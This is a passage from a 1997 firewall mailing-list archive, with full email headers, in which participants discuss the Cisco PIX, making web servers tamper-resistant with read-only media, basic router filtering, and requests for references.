that were necessary > > for execution. Then if the kernel didn't see this stuff it shuts down. > > This way you could delete from the PRODUCTION system all likely tools > > (chown, chmod, telnet, rxx, mknod, ifconfig, route, etc) and if the villain > > tried to add his/her own the box would croak. I would take that type of > > hardening over B1 any day. (Yes you need a non production IE no network > > code kernel for maintenance mode.) > > > > > > -Charles Kaplan I wouldn't. How about the application sitting in your stack? -Julian Assange From firewalls-owner Mon Jan 6 15:08:11 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id OAA01030 for firewalls-outgoing; Mon, 6 Jan 1997 14:40:17 -0800 (PST) Received: from hp5.xlconnect.com ([166.80.10.159]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id OAA01012 for ; Mon, 6 Jan 1997 14:40:05 -0800 (PST) Received: by hp5.xlconnect.com with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63) id <01BBFBF8.5B942FC0@hp5.xlconnect.com>; Mon, 6 Jan 1997 17:37:58 -0500 Message-ID: From: "Larson, Erik" To: "'keithstevens@acsinc.net'" , "'Firewalls-Digest@GreatCircle.com'" Subject: RE: Cisco PIX Date: Mon, 6 Jan 1997 17:40:15 -0500 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I like the PIX in concept and sometimes in practice. I do wish it offered client software to allow remote VPN access, however. That particular feature is critical in much of the work we do for our customer base. -ekl >-----Original Message----- >From: keithstevens@acsinc.net [SMTP:keithstevens@acsinc.net] >Sent: Sunday, January 05, 1997 11:14 PM >To: Firewalls-Digest@GreatCircle.com >Subject: Cisco PIX > >Is there a bastion host / proxy server that out-performs >Cisco's PIX in throughput? Security? Ease of implementation? >From my limited perspective as a newbie, the Cisco PIX in >combination with a good screening router is a very good >firewall. Not to be a wise guy, I'm seriously asking, with this >technology available, is there ever a reason to build one from >scratch? I might be able to do it cheaper - but if it takes a couple >weeks or a month to do It might cost more. I'm not in any way >affiliated with Cisco. >KeithStevens >keith@acsinc.net > From firewalls-owner Mon Jan 6 18:37:09 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id PAA06595 for firewalls-outgoing; Mon, 6 Jan 1997 15:59:20 -0800 (PST) Received: (mcb@localhost) by miles.greatcircle.com (8.7.4/Miles-960830-1) id PAA06506 for firewalls@greatcircle.com; Mon, 6 Jan 1997 15:58:53 -0800 (PST) Received: from odin.cmp.ilstu.edu (odin.cmp.ilstu.edu [138.87.1.13]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id QAA24278 for ; Thu, 2 Jan 1997 16:55:50 -0800 (PST) From: mrwilhe@odin.cmp.ilstu.edu Received: from socrates-11.isbe.state.il.us by odin.cmp.ilstu.edu (AIX 4.1/UCB 5.64/4.03) id AA22944; Thu, 2 Jan 1997 18:54:41 -0600 Message-Id: <1.5.4.32.19970103005926.008e412c@odin.cmp.ilstu.edu> X-Sender: mrwilhe@odin.cmp.ilstu.edu X-Mailer: Windows Eudora Light Version 1.5.4 (32) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Thu, 02 Jan 1997 18:59:26 -0600 To: firewalls@GreatCircle.COM Subject: airfhack--secure/hacked web server Sender: firewalls-owner@GreatCircle.COM Precedence: bulk for some reason this was not posted the first time i sent it: On the idea of the ram mem--it would have to be something special--only changed by physical means(rebooting?)--one could not inflict something of non-physical forces to change the ram. (sorta like bios holding a passwd--you can clear the password by taking the chip out -- yes i know there are ways around this, but something similar for the ram mem/disk would suffice to keep it from being hacked. Another statement that was brought up was that cd-rom or other write once or a physical write lock on the hard drive(hd prob more practical) would being able to change the page often-- my statement i made at first was meant for only sites that don't change there pages often -- not pages such as www.news.com. I don't believe that the main pages of the cia/dia/fbi/nsa/ni/and other sites that hold stats..... change there pages that often. fsh <<>> The following are some of the major points made on this subject (sorry if i left out some). "Seriously: why not just put it on a separate disk which is mounted > read-only? If you want to go further, you could buy a suitable harddisk > which can be write-locked by hardware. regards:jamie" " The Web server would have to be based on all write once media -- from the > Operating systems and all other aspects, otherwise the attacker would just > redirect the homepage contents to a hard drive. Doesn't matter, I could just launch a server that redirected you to a site with the content mirrored and altered, or serve the pages out of memory, or off of RAM disk." From: "Paul D. Robertson" "A CD-ROM -based web server would be fine if you created web pages, pressed a CD, and then never again expected to add/delete/modify the content. But this is The Real World (tm)." Mark Johnson "Not to disagree with anything Paul has said, because I don't, but the original premise was government web sites not high volume web sites. How often does the Air Force's web pages need to change? Not too often I would wager, they don't *need* re-visits, they don't have advertising (at least I would expect they don't, I haven't checked actually), they are there just to provide some mostly static information. Given that, I think there is merit to a write-once media approach. But not, as Paul and others point out, as a general solution." Dave Kinchlea [from Michael Idengren:] > I don't know about the rest of you but I agree with the idea of putting a > webserver on a CD-ROM. [from Thomas Leitner:] > why not just put it on a separate disk which is mounted > read-only? [from Dale Drew:] > Using a CDROM web-server doesn't provide resistance to an > attacker who gains access to the system as ROOT... Keep in mind that this entire thread assumes that the attacker will *not* take an easier approach, such as compromising the DNS records that point to the server. In this case, the attacker can create any web content they like, spend all the time in the world creating it, and then quickly convince the DNS servers that www.foo.com now resolves to the new (fake) address. Securing your www server is just a first (although important) step. I do think read-only media is an interesting idea, by the way :) Dale is right though, there are still vulnerabilities. Personally, I like the idea of marking the files immutable myself. This way, even root can't change the content unless the machine is brought down into single-user mode. Not sure how many other operating systems support this other than (the great) BSDI though. Happy new year (2 minutes to go...), Norm 1. My comment was partially meant as a joke, it's horribly impractical for ISP's and Univerisities and such to require operator intervention every time a webpage needs to be updated. Such a level of paranoia *might* only be appropriate for government agencies and authoritative advanced research sites. From: Michael Idengren From firewalls-owner Mon Jan 6 18:38:37 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id RAA12310 for firewalls-outgoing; Mon, 6 Jan 1997 17:13:09 -0800 (PST) Received: from whisp.cs.uow.edu.au (whisp.cs.uow.edu.au [130.130.64.5]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id RAA12301 for ; Mon, 6 Jan 1997 17:12:58 -0800 (PST) Received: from strauss.cs.uow.edu.au (strauss.cs.uow.edu.au [130.130.64.97]) by whisp.cs.uow.edu.au (8.8.4/8.7.3) with ESMTP id MAA08536 for ; Tue, 7 Jan 1997 12:12:28 +1100 (EST) From: Kok Seng Tan Received: (from kst01@localhost) by strauss.cs.uow.edu.au (8.8.4/8.7.1) id MAA16949 for firewalls@greatcircle.com; Tue, 7 Jan 1997 12:12:26 +1100 (EST) Message-Id: <199701070112.MAA16949@strauss.cs.uow.edu.au> Subject: ATM Firewalls To: firewalls@greatcircle.com Date: Tue, 7 Jan 1997 12:12:24 +1100 (EST) X-Mailer: ELM [version 2.4ME+ PL11 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, I am looking for information on ATM Firewalls. Anyone can help with some references, URLs ? -- ============================================================== Steven K.S. Tan @ The University of Wollongong, NSW, Australia Email Address : kst01@uow.edu.au Tel : 61-42-261152 ============================================================== From firewalls-owner Mon Jan 6 18:41:28 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id SAA15857 for firewalls-outgoing; Mon, 6 Jan 1997 18:05:24 -0800 (PST) Received: from diablo.cisco.com (diablo.cisco.com [171.68.223.106]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id SAA15848 for ; Mon, 6 Jan 1997 18:05:14 -0800 (PST) Received: from mhoward-pc.cisco.com (dhcp-vm1-2-202.cisco.com [171.68.164.202]) by diablo.cisco.com (8.8.4/CISCO.SERVER.1.2) with SMTP id SAA17870; Mon, 6 Jan 1997 18:04:26 -0800 (PST) Message-Id: <2.2.32.19970107021039.008cb3d8@diablo.cisco.com> X-Sender: mhoward@diablo.cisco.com X-Mailer: Windows Eudora Pro Version 2.2 (32) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Mon, 06 Jan 1997 18:10:39 -0800 To: "Larson, Erik" , "'keithstevens@acsinc.net'" , "'Firewalls-Digest@GreatCircle.com'" From: Matthew Howard Subject: RE: Cisco PIX Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In the mill. The Private Link Encryption card today supports AH/ESP tunnel mode, with DES (cbc). We need to do some additional testing with client software. matt At 05:40 PM 1/6/97 -0500, Larson, Erik wrote: >I like the PIX in concept and sometimes in practice. I do wish it >offered client software to allow remote VPN access, however. That >particular feature is critical in much of the work we do for our >customer base. > >-ekl > > > >>-----Original Message----- >>From: keithstevens@acsinc.net [SMTP:keithstevens@acsinc.net] >>Sent: Sunday, January 05, 1997 11:14 PM >>To: Firewalls-Digest@GreatCircle.com >>Subject: Cisco PIX >> >>Is there a bastion host / proxy server that out-performs >>Cisco's PIX in throughput? Security? Ease of implementation? >>From my limited perspective as a newbie, the Cisco PIX in >>combination with a good screening router is a very good >>firewall. Not to be a wise guy, I'm seriously asking, with this >>technology available, is there ever a reason to build one from >>scratch? I might be able to do it cheaper - but if it takes a couple >>weeks or a month to do It might cost more. I'm not in any way >>affiliated with Cisco. >>KeithStevens >>keith@acsinc.net >> > > Matthew Howard Product Line Manager mhoward@cisco.com Internet Business Unit 408-526-4720 (voice) Cisco Systems Inc. 408-527-8122 (fax) 170 West Tasman Drive Building VM2 (corner of First & Vista Montana) San Jose, CA 95134 From firewalls-owner Mon Jan 6 18:59:08 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id PAA05830 for firewalls-outgoing; Mon, 6 Jan 1997 15:52:00 -0800 (PST) Received: from relay-11.mail.demon.net (relay-11.mail.demon.net [194.217.242.137]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id PAA05763 for ; Mon, 6 Jan 1997 15:51:25 -0800 (PST) Received: from tracker.demon.co.uk ([158.152.150.126]) by relay-9.mail.demon.net id ae900666; 6 Jan 97 23:04 GMT From: Les Carleton To: Xavier Fauquet Cc: firewalls@greatcircle.com Subject: Re: Using Remote Workstation as Hole?? Date: Mon, 06 Jan 1997 23:04:03 GMT Organization: The Doghouse Reply-To: les@tracker.demon.co.uk Message-ID: <32d982eb.505212@post.demon.co.uk> References: <19970106081219047.AAA228@kafka.imatranet.com> In-Reply-To: <19970106081219047.AAA228@kafka.imatranet.com> X-Mailer: Forte Agent .99g/32.339 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: quoted-printable Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Mon, 6 Jan 1997 00:49:13 +0100, you wrote: >Could someone points me to a site explaining me what is >Winframe ? I think ... http://www.cytrix.com ?=20 Winframe is a remote processing system which allows PC clients to run = server applications on a Windows system rather than using their own processing = power. I think. ...Les... From firewalls-owner Mon Jan 6 19:19:18 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id PAA05177 for firewalls-outgoing; Mon, 6 Jan 1997 15:45:00 -0800 (PST) Received: (mcb@localhost) by miles.greatcircle.com (8.7.4/Miles-960830-1) id PAA05158 for firewalls@greatcircle.com; Mon, 6 Jan 1997 15:44:49 -0800 (PST) Received: from mtymail.avantel-icom.com.mx ([200.33.228.147]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id HAA26523 for ; Fri, 3 Jan 1997 07:20:42 -0800 (PST) Received: by mtymail.avantel-icom.com.mx with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63) id <01BBF957.1EE0F1B0@mtymail.avantel-icom.com.mx>; Fri, 3 Jan 1997 09:18:45 -0600 Message-ID: From: Ricardo Alvarado To: "firewalls@GreatCircle.COM" Subject: Re: internal filtering router - filter config? Date: Fri, 3 Jan 1997 09:20:46 -0600 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >What type of things would you filter on the internal router? or even >the external router? I am going to be installing a firewall real soon >and would really appreciate any help. > >-steve. >matkoski@dreamscape.com In your external router you'd block any ICMP traffic going back and forth, as well as any packets bearing one of your internal IP addresses, as a source address, especially if these are going INTO your protected network. Also, kill telnets, fingers, snmp and snmp trap. Actually, kill any ports that your users will not be using, andl leave just mail, web, ftp, etc. ricardo ralvarado@avantel.com.mx From firewalls-owner Mon Jan 6 19:23:29 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id PAA05042 for firewalls-outgoing; Mon, 6 Jan 1997 15:44:07 -0800 (PST) Received: (mcb@localhost) by miles.greatcircle.com (8.7.4/Miles-960830-1) id PAA03172 for firewalls@greatcircle.com; Mon, 6 Jan 1997 15:21:01 -0800 (PST) Received: from procion.ulpgc.es (procion.ulpgc.es [193.145.133.21]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id DAA15845 for ; Fri, 3 Jan 1997 03:52:41 -0800 (PST) Received: by procion.ulpgc.es; id AA16311; Fri, 3 Jan 1997 11:52:08 GMT Received: from cic.teleco.ulpgc.es by fobos.ulpgc.es (5.65/Ultrix4.2-C) id AA06684; Fri, 3 Jan 1997 11:54:08 GMT Received: from neumann.teleco.ulpgc.es by cic (4.1/SMI-4.1) id AA08241; Fri, 3 Jan 97 11:57:52 GMT Received: from NEUMANN/CORREO by neumann.teleco.ulpgc.es (Mercury 1.12); Fri, 3 Jan 97 12:02:03 +00 Received: from CORREO by NEUMANN (Mercury 1.12); Fri, 3 Jan 97 12:01:57 +00 From: "JUAN JOSE JOVER BARBERO" To: firewalls@greatcircle.com Date: Fri, 3 Jan 1997 12:01:50 GMT Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7BIT Subject: help in spanish X-Mailer: Pegasus Mail v3.22 Message-Id: <197A811904@neumann.teleco.ulpgc.es> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Please, I don't speak english very vell. If anybody knows where I can find books of firewalls in spanish I'll be more happy. Send me directions to obtain that books via ftp or another. pd: Estoy haciendo trabajo de fin de carrera en la universidad de las palmas de gran canaria y con el ingles estoy un poco perdido. Agradezco su colaboracion. ------------------------------------------------------ UNIVERSIDAD DE LAS PALMAS DE GRAN CANARIA JUAN JOSE JOVER BARBERO ESTUDIANTE DE INGENIERIA TECNICA DE TELECOMUNICACIONES ------------------------------------------------------ From firewalls-owner Mon Jan 6 20:09:32 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id TAA21695 for firewalls-outgoing; Mon, 6 Jan 1997 19:50:42 -0800 (PST) Received: from thor.tjhsst.edu (thor.tjhsst.edu [198.38.16.100]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id TAA21677 for ; Mon, 6 Jan 1997 19:50:30 -0800 (PST) Received: from localhost.tjhsst.edu (localhost.tjhsst.edu [127.0.0.1]) by thor.tjhsst.edu (8.8.4/8.8.2) with SMTP id DAA26466; Tue, 7 Jan 1997 03:50:03 GMT Message-Id: <199701070350.DAA26466@thor.tjhsst.edu> To: Kok Seng Tan cc: firewalls@greatcircle.com, jcroall@foo.org Subject: Re: ATM Firewalls In-reply-to: Your message of "Tue, 07 Jan 1997 12:12:24 EST." <199701070112.MAA16949@strauss.cs.uow.edu.au> Date: Mon, 06 Jan 1997 22:50:01 EST From: "James Croall" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In message <199701070112.MAA16949@strauss.cs.uow.edu.au>, Kok Seng Tan writes: >I am looking for information on ATM Firewalls. Anyone can help with some >references, URLs ? Network Systems Corp. seems to have a very interesting product on the horizon. Might want to take a look at www.network.com/netcom/products/security/atm/ --- James B. Croall jcroall@foo.org From firewalls-owner Tue Jan 7 03:59:48 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id DAA14740 for firewalls-outgoing; Tue, 7 Jan 1997 03:48:16 -0800 (PST) Received: from nova.dcrt.nih.gov (nova.dcrt.nih.gov [128.231.230.74]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id DAA14733 for ; Tue, 7 Jan 1997 03:48:04 -0800 (PST) Received: (from eric@localhost) by nova.dcrt.nih.gov (8.7.5/8.7.3) id GAA17174 for firewalls@greatcircle.com; Tue, 7 Jan 1997 06:53:30 -0500 From: "Eric K. Dickinson" Message-Id: <199701071153.GAA17174@nova.dcrt.nih.gov> Subject: Web Site Hacking To: firewalls@greatcircle.com Date: Tue, 7 Jan 1997 06:53:30 -0500 (EST) X-Mailer: ELM [version 2.4 PL25] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I am wondering if this is a suitable solution. Could one not set up a passive defence by over writing the presented home-pages at a predeterminded time and at some other trigger such as a write or copy. Any unauthorized action could also be used as a trigger to just "over write". The real home-page coud be anywhere accessable only by the OS itself or another hardened location not presented to the world. I am used to the Unix world and have more experience there than NT. Any Ideas? Thoughts? Or is this out in let field? eric@nova.dcrt.nih.gov From firewalls-owner Tue Jan 7 06:14:15 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id FAA18281 for firewalls-outgoing; Tue, 7 Jan 1997 05:46:05 -0800 (PST) Received: from deere-bh.dx.deere.com (deere-bh.dx.deere.com [207.122.201.66]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id FAA18268 for ; Tue, 7 Jan 1997 05:45:53 -0800 (PST) Received: (from uucp@localhost) by deere-bh.dx.deere.com (8.6.12/8.6.11) id HAA06277; Tue, 7 Jan 1997 07:46:13 -0600 Received: from deere.dx.deere.com by deere-bh.dx.deere.com via smap (V1.3) id sma006080; Tue Jan 7 07:45:49 1997 Received: from 90.deere.com (dts.90.deere.com) by deere.dx.deere.com (4.1/SMI-4.0) id AA27573; Tue, 7 Jan 97 07:45:00 CST Received: from dogbert by 90.deere.com (SMI-8.6/SMI-SVR4) id HAA18288; Tue, 7 Jan 1997 07:43:00 -0600 Message-Id: <32D252E4.155B@90.deere.com> Date: Tue, 07 Jan 1997 07:43:00 -0600 From: Bert Carroll X-Mailer: Mozilla 3.0 (X11; I; SunOS 5.5.1 sun4u) Mime-Version: 1.0 To: Andrew Hobson Cc: Michael Warfield , firewalls@GreatCircle.COM Subject: Re: Christopher Klaus and ISS References: <199701061733.MAA06710@arden.iss.net> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Like many others I'm not interested in Flaming Chris Klaus or have time to. I still think the subject of web server security needs its own list (not firewalls) and needs a leader (someone smarter than me) to moderate the list. Bert Carroll bc17684@90.deere.com From firewalls-owner Tue Jan 7 07:12:43 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA19755 for firewalls-outgoing; Tue, 7 Jan 1997 06:41:21 -0800 (PST) Received: from exch-bel1.attachmate.com (exch-bel1.attachmate.com [149.82.1.46]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id GAA19748 for ; Tue, 7 Jan 1997 06:41:08 -0800 (PST) Received: by exch-bel1.attachmate.com with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63) id <01BBFC65.7CAC8C80@exch-bel1.attachmate.com>; Tue, 7 Jan 1997 06:39:09 -0800 Message-ID: From: Darren Cromer To: "'Xavier Fauquet'" , "'les@tracker.demon.co.uk'" Cc: "'firewalls@GreatCircle.COM'" Subject: RE: Using Remote Workstation as Hole?? Date: Tue, 7 Jan 1997 06:39:11 -0800 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Actually I believe it is www.citrix.com >---------- >From: Les Carleton[SMTP:les@tracker.demon.co.uk] >Sent: Monday, January 06, 1997 6:04 PM >To: Xavier Fauquet >Cc: firewalls@GreatCircle.COM >Subject: Re: Using Remote Workstation as Hole?? > >On Mon, 6 Jan 1997 00:49:13 +0100, you wrote: >>Could someone points me to a site explaining me what is >>Winframe ? > >I think ... http://www.cytrix.com ? > >Winframe is a remote processing system which allows PC clients to run server >applications on a Windows system rather than using their own processing >power. > >I think. > >...Les... > From firewalls-owner Tue Jan 7 08:00:08 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA20547 for firewalls-outgoing; Tue, 7 Jan 1997 06:52:43 -0800 (PST) Received: from ALABAMA.CF.CS.YALE.EDU (RT-GW.CS.YALE.EDU [128.36.0.13]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id GAA20538 for ; Tue, 7 Jan 1997 06:52:30 -0800 (PST) From: long-morrow@CS.YALE.EDU Received: from SPARKY.CF.CS.YALE.EDU by ALABAMA.CF.CS.YALE.EDU (8.7.1/res.host.cf-4.0) with ESMTP id JAA08316; Tue, 7 Jan 1997 09:51:24 -0500 (EST) sender long-morrow@CS.YALE.EDU for Received: by SPARKY.CF.CS.YALE.EDU (Sendmail-8.7.1/res.client.cf-4.0) id JAA27171; Tue, 7 Jan 1997 09:51:19 -0500 (EST) Date: Tue, 7 Jan 1997 09:51:19 -0500 (EST) Message-Id: <199701071451.JAA27171@SPARKY.CF.CS.YALE.EDU> To: ahobson@mindspring.com, bc17684@90.deere.com Subject: re: Web server security, was Re: Christopher Klaus and ISS Cc: firewalls@GreatCircle.COM, mhw@arden.iss.net Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Bert Carroll wrote: >Like many others I'm not interested in Flaming Chris Klaus or have time >to. I still think the subject of web server security needs its own list >(not firewalls) and needs a leader (someone smarter than me) to moderate >the list. I'm not certain how much they talk about specific server security problems (vs. basic HTTP protocol security issues) but I found this in the WWW Security FAQ [http://www-genome.wi.mit.edu/WWW/faqs/wwwsf1.html#Q8] V 1.3.0, Nov 8 1996 by Lincoln D. Stein : ... A mailing list devoted specifically to issues of WWW security is maintained by the IETF Web Transaction Security Working Group. To subscribe, send e-mail to www-security-request@nsmx.rutgers.edu. In the body text of the message write: SUBSCRIBE www-security your_email_address ... - Morrow From firewalls-owner Tue Jan 7 09:14:46 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA26604 for firewalls-outgoing; Tue, 7 Jan 1997 08:58:32 -0800 (PST) Received: from sdg.hon.com (galip.vnet.net [166.82.174.200]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id IAA26573 for ; Tue, 7 Jan 1997 08:58:14 -0800 (PST) Received: from sdg.hon.com (sdg.hon.com [166.82.174.200]) by sdg.hon.com (NTMail 3.02.10) with ESMTP id ea000004 for ; Tue, 7 Jan 1997 11:54:16 -0600 Message-ID: <32D27FB5.2F8C@hon.com> Date: Tue, 07 Jan 1997 11:54:13 -0500 From: Steve Reply-To: Steve@hon.com Organization: sdg consulting X-Mailer: Mozilla 3.01Gold (WinNT; I) MIME-Version: 1.0 To: "Eric K. Dickinson" CC: firewalls@greatcircle.com Subject: Re: Web Site Hacking References: <199701071153.GAA17174@nova.dcrt.nih.gov> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-Info: Evaluation version at sdg.hon.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Eric K. Dickinson wrote: > > I am wondering if this is a suitable solution. Could one not set up a passive > defence by over writing the presented home-pages at a predeterminded time and > at some other trigger such as a write or copy. Any unauthorized action could > also be used as a trigger to just "over write". The real home-page coud be > anywhere accessable only by the OS itself or another hardened location not > presented to the world. I am used to the Unix world and have more experience > there than NT. > > Any Ideas? Thoughts? Or is this out in let field? > > eric@nova.dcrt.nih.gov Eric, A very interesting thought..but firewalls are supposed to prevent users from being able to tamper in the first place. But, I for one am going to give that more serious consideration as I see its possibilities for use on maybe another machine on the LAN to check on the status of say a web server. Thanks for the idea.. Steve Steve@hon.com sdg consulting From firewalls-owner Tue Jan 7 11:44:51 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id LAA03751 for firewalls-outgoing; Tue, 7 Jan 1997 11:15:06 -0800 (PST) Received: from interlock.reston.ans.net (interlock.reston.ans.net [192.77.167.2]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id LAA03732 for ; Tue, 7 Jan 1997 11:14:55 -0800 (PST) From: oconnor@reston.ans.net Received: by interlock.reston.ans.net id AA02945 (InterLock SMTP Gateway 3.0 for firewalls@greatcircle.com); Tue, 7 Jan 1997 14:13:39 -0500 Message-Id: <199701071913.AA02945@interlock.reston.ans.net> Received: by interlock.reston.ans.net (Internal Mail Agent-1); Tue, 7 Jan 1997 14:13:39 -0500 Date: Tue, 7 Jan 1997 14:10:05 -0500 To: firewalls@greatcircle.com Subject: Re: Web Site Hacking Cc: eric@nova.dcrt.nih.gov, Steve@hon.com Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Content-Md5: bzvhJJeSv+2vI5mraVRQ7w== Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Today's Washington Post had a brief article regarding the ForceField product from TIS which is apparently intended to address this issue. Unfortunately you have to register to find out anything specific about the package, e.g. which OS it replaces/augments. They do tell you the price however :-). I've registered but the implication is that the more specific information will be sent surface mail. Mike From firewalls-owner Tue Jan 7 12:26:56 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id LAA05214 for firewalls-outgoing; Tue, 7 Jan 1997 11:56:26 -0800 (PST) Received: from DOCKMASTER.NCSC.MIL (DOCKMASTER.NCSC.MIL [198.26.55.74]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id LAA05204 for ; Tue, 7 Jan 1997 11:56:08 -0800 (PST) Date: Tue, 7 Jan 97 14:53 EST From: Wilner@DOCKMASTER.NCSC.MIL Subject: Re: Re: NCSA != NCSC To: firewalls@GREATCIRCLE.COM Message-ID: <970107195334.971794@DOCKMASTER.NCSC.MIL> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > I have to say up front that I agree with MJR. > > . . . if the firewall software is implemented below the O/S layer > . . . then the O/S will never even "see" . . . Everything except boot-up depends upon the O/S. Nothing is below the "O/S layer," nor does one speak of such a layer unless one intends "application layer" and doesn't know an application from an O/S, nor can a single byte be sent or retrieved over a device (networked or otherwise) unless an O/S is relied upon, nor can a single access to memory, disk, or what-have-you be performed by networking code "below the O/S layer," as we so quaintly say, if there is no O/S involved. Gentlemen, if this represents your understanding of operating systems and security, please contribute to alt.brush-sellers, not to firewalls. From firewalls-owner Tue Jan 7 12:27:52 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id LAA04208 for firewalls-outgoing; Tue, 7 Jan 1997 11:30:43 -0800 (PST) Received: from eagle.anheuser-busch.com ([151.145.250.198]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id LAA04199 for ; Tue, 7 Jan 1997 11:30:34 -0800 (PST) Received: (from smap@localhost) by eagle.anheuser-busch.com (8.7.5/8.6.12) id NAA10490 for ; Tue, 7 Jan 1997 13:24:27 -0600 (CST) Received: from stlabcexg001.anheuser-busch.com(151.145.101.151) by eagle.anheuser-busch.com via smap (V1.3) id sma010488; Tue Jan 7 13:24:03 1997 Received: by stlabcexg001.anheuser-busch.com with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63) id <01BBFC9E.C4FA4930@stlabcexg001.anheuser-busch.com>; Tue, 7 Jan 1997 13:29:12 -0600 Message-ID: From: "Starkweather, Mike" To: "'firewalls@GreatCircle.COM'" Subject: Pointcast Date: Tue, 7 Jan 1997 13:29:08 -0600 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I am wondering how the members of this mail list have handled the flood of traffic generated by Pointcast. It has buried our firewall (Tis Toolkit) with the huge number of requests it generates. Their I-Server seems to help some but not as much as I had hoped. If this is the wrong place for this question please redirect me. Mike Starkweather Anheuser-Busch From firewalls-owner Tue Jan 7 13:04:55 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id LAA05146 for firewalls-outgoing; Tue, 7 Jan 1997 11:55:01 -0800 (PST) Received: from smartwall.v-one.com (smartwall.v-one.com [206.205.89.11]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id LAA05133 for ; Tue, 7 Jan 1997 11:54:49 -0800 (PST) Received: by smartwall.v-one.com; id OAA25378; Tue, 7 Jan 1997 14:54:29 -0500 (EST) Received: from nt_fs1.v-one.com(198.69.135.3) by smartwall.v-one.com via smap (V3.1.1) id xma025373; Tue, 7 Jan 97 14:54:27 -0500 Received: by nt_fs1.V-ONE.COM with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63) id <01BBFCAA.EA5772A0@nt_fs1.V-ONE.COM>; Tue, 7 Jan 1997 14:56:08 -0500 Message-ID: From: "McMahan, Peg" To: "'Firewalls Mailing List'" , "'Carl Karlsson'" Subject: RE: NT NAT Date: Tue, 7 Jan 1997 14:56:07 -0500 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk 